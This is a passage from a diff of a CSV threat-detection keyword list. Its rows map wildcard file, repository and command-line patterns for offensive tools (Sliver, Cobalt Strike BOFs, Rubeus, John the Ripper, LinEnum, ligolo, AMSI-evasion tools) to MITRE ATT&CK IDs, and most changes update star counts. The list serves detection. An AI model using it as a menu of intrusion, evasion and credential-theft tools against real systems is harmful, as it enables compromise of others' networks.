TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*ldeep_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ldif2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*leaky/leakbuf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*leapsecurity*","offensive_tool_keyword","Github Username","github repo name hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/leapsecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*legalhackers.com/exploits/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*lem0nSec/ShellGhost*","offensive_tool_keyword","ShellGhost","A 
memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*lem0nSec/ShellGhost*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*lengjibo/FourEye*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*Leo4j/Invoke-SMBRemoting*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*LetMeOutSharp.*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*LFI scanner checks.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*lgandx/Pcredz*","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*LHOST=* LPORT=*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*liamg/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*liamg/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*lib/Bruteforcer.cs*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"*lib/ForgeTicket.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*lib/S4U.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*lib/ForgeTicket.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*lib/S4U.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*LibcRealpathBufferUnderflow/RationalLove.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*libFuzzer-HOWTO.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libFuzzer-HOWTO.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*libnspr_nspr_log_file_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*libreoffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libnspr_nspr_log_file_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*libreoffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*libs/bofalloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*libs/bofentry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*libs/bofhelper*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*LibSnaffle.ActiveDirectory*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*LibSnaffle.FileDiscovery*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*libSSH-Authentication-Bypass*","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z" -"*libxpc_mitm_ssudo.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*libxpc_mitm_ssudo.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*libxselinux.old*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*libxselinux.so*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - 
T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lightsout.py*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" 
@@ -13105,43 +13262,43 @@ "*ligolo_windows*.exe*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-master*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-ng -selfcert*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*LinEnum.sh*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" -"*LinEnum-master.ip*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege 
Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*LinEnum.sh*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*LinEnum-master.ip*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*link_tcp 127.0.0.1 *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*linkedin2username.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*LinkedInt*","offensive_tool_keyword","LinkedInt","LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - 
TA0004","N/A","N/A","Information Gathering","https://github.com/mdsecactivebreach/LinkedInt","1","0","N/A","N/A","5","463","112","2023-05-23T23:34:22Z","2017-07-12T12:58:47Z" -"*linpeas_builder.py*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_builder.py*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_darwin_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_darwin_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 
